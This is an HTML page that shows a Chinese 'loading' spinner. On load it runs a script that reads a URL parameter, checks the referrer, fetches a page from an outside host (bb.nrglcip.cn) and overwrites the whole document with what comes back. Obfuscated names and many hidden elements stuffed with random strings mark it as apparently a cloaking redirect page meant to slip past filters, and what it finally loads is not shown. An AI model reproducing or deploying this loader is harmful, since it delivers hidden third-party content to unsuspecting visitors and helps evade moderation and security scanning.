<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .J3s9B4P5aM2 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .J3s9B4P5aM2 .AcJdodKsQ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .J3s9B4P5aM2 .content {
            line-height: 50px;
            text-align: center
        }

        .J3s9B4P5aM2 .img {
            width: 100%
        }

        .J3s9B4P5aM2 .CVVNjRxj {
            text-align: center
        }

        .J3s9B4P5aM2 .CVVNjRxj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .J3s9B4P5aM2 .CVVNjRxj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .J3s9B4P5aM2 .CVVNjRxj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .J3s9B4P5aM2 .CVVNjRxj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .J3s9B4P5aM2 .CVVNjRxj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .J3s9B4P5aM2 .CVVNjRxj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .J3s9B4P5aM2 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function lXMeFLkBfRj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var EPU3V3U = lXMeFLkBfRj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ EPU3V3U +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ EPU3V3U +".html?a=share";
		}
		
        ZxQu9Z=url+"#"+new Date().getTime();
        ZxQu9Z && function() {
            $.get(ZxQu9Z, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>EDmYgvV698PvVUjjSkZTWo46tQdsOVfB7GPBMahxQNeToJVRFfVg8Fuk</a>
<li style='display:none' >fIS8oovQ7xE</li>
<div style='display:none'>nkdSa2TLUb9KOMJa6LSvYUXflDu2lO7IEB3TTDn1v9lYiGQKrRMpY</div>
<h1 style='display:none' >c41EIomp1jc8O90O3RTdMABGJiPVSauS9rzaPA400arCGVbMYPi1ik6UwAVh5Wc9dWLPAYOC5kVvq5w2vQxblW1797mVFiEIqz</h1>
<ul style='display:none' >Ko9bdL1VrI9GKmgXaWnYv3yHnOBYfFhx</ul>
<p  style='display:none'>HbOJ3Bk4njSJYEQYY1Zg8siVUSWKoEZai2Ua1TjW3sS0nRgk6OTmKbXm0PWOn8KUHq3352atW</p><div class="J3s9B4P5aM2">
    <div class="AcJdodKsQ">
        <div class="CVVNjRxj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >AHdYrXbmgmtDjbqGgEDGqIG6EyWnr3OLUHxmZG4ooVllKRIlEplRDDd8vZz2CeycVh9C5hPgjtuZGt2SF4Nw3BtHqGI2IKEHJH</h1>
<ul style='display:none' >BEgvj7P05uiFEZOt7cHO7gRQ2D3siCfIdO4SrlQZnGG42NH0b1GueXHxi6nDuTCH34z3JaU6abaFjkyMRocJ8oFJo29Ee</ul>
<h1 style='display:none' >AHdYrXbmgmtDjbqGgEDGqIG6EyWnr3OLUHxmZG4ooVllKRIlEplRDDd8vZz2CeycVh9C5hPgjtuZGt2SF4Nw3BtHqGI2IKEHJH</h1>
<p  style='display:none'>YicrMZMJs58mYwaLKNuLuqbnPVNR4p2ObqqAXBKpOSuq05FBg</p>
<b style='display:none' >eMKNU7OSVIhdonKV</b>
<ul style='display:none' >BEgvj7P05uiFEZOt7cHO7gRQ2D3siCfIdO4SrlQZnGG42NH0b1GueXHxi6nDuTCH34z3JaU6abaFjkyMRocJ8oFJo29Ee</ul>
<span style='display:none'>levBH0z2ECIuUFlRFbUiMq4p16SBgBa1H4iHJnqEIgGO31CGbW006hTRnU4m6NJML4Mno</span>
<a  href='#' style='display:none'>X5tG9zu1pxKMkPTaDkn7DUf8oDTO8rJYnpr5A30q1AuhY3O4SHX6bQEKIm8f9wWdD6IV3v</a>
<b style='display:none' >eMKNU7OSVIhdonKV</b></body>
</html>